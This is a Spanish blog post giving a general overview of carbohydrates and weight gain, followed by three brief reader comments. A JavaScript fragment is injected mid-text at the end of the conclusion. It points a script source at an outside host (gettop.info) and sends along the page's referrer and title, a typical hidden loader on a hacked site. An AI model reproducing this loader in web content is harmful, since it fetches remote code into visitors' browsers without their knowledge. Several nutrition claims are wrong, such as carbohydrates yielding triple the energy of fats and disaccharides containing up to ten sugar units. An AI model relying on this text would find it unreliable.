Salud y belleza » Alimentación

Una aproximación a los carbohidratos

3 Comentarios

Los hidratos de carbono representan una fuente de energía excepcional para el organismo y, por ende, un grupo de elementos de consumo obligado para la mayoría de los deportistas, en especial los que practican actividades de alta intensidad física. Pero existe una dicotomía en torno a estos elementos: sucede que si bien la energía adquirida por la metabolización de los carbohidratos es triplemente superior a la obtenida a través de las grasas, en contrapunto las reservas que poseemos siempre son mayores. Por lo tanto, así como se necesita consumir carbohidratos para tener energía, también es necesario, luego, quemar esos excesos mediante actividad física.

En cuánto a su clasificación, entre los carbohidratos generales se encuentran los monosacáridos -glúcidos básicos, compuestos por una única molécula-, disacáridos -combinación de dos azucares: alberga hasta diez moléculas de monosacáridos- y finalmente los llamados polisacáridos -cadena compleja que, naturalmente, contiene incluso más de mil sacáridos-.

Pero, entonces, ¿engordan o no los carbohidratos?

Existe una creencia errónea en cuánto a los valores calóricos de los carbohidratos. Naturalmente, cualquier sustancia que consumamos de forma excesiva tenderá a acumularse en nuestro organismo de forma permanente y como grasa, también los carbohidratos. Pero, aún así, éstos elementos, incorporados en su medida justa, pueden ser fácilmente transformados. Fuentes de carbohidratos como la avena, el arroz integral y la batata, por ejemplo, difícilmente lograrán que una persona engorde. Ocurre que, a menudo, el estilo de vida sedentario lleva al hombre por el mal camino y hace que todo carbohidrato que éste consuma se vuelva, automáticamente, una carga para el organismo. La solución, desde ya, está en no dejar de consumir carbohidratos especiales sino, por el contrario, complementarlos con ejercicio.

¿Qué hay de ciertos carbohidratos como por ejemplos los famosos cereales?

Con los cereales sucede un fenómeno particular: al presentar una buena digestión (fibra), es más fácil desecharlos y sentirse nuevamente liviano. Toda dieta que se precie de ser tal, tiene un alto número de comidas en donde el cereal es rey. Lo que se debe hacer es, al consumir el cereal, evitar hacerlo con productos como leche entera, azúcar o miel. Ningún cereal que no esté procesado, ni endulzado, ni con agregados engorda o puede derivar en sobrepeso.

Como conclusión basta decir que los carbohidratos nos nutren de suficiente energía y son fundamentales para cualquier dieta pero, para que esa misma energía no se transforme en una “reserva”, es necesario realizar ejercicio y deporte en la medida en que se incorporen dichos sacáridos.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

3 Comments »

  • chicoblur said:

    exelente aporte gracias :D

  • jhhf said:

    que bueno estooooooooooooo para la escueellllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

  • jjjjjfhjh said:

    que buenooooooooooooooo para en colegio

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.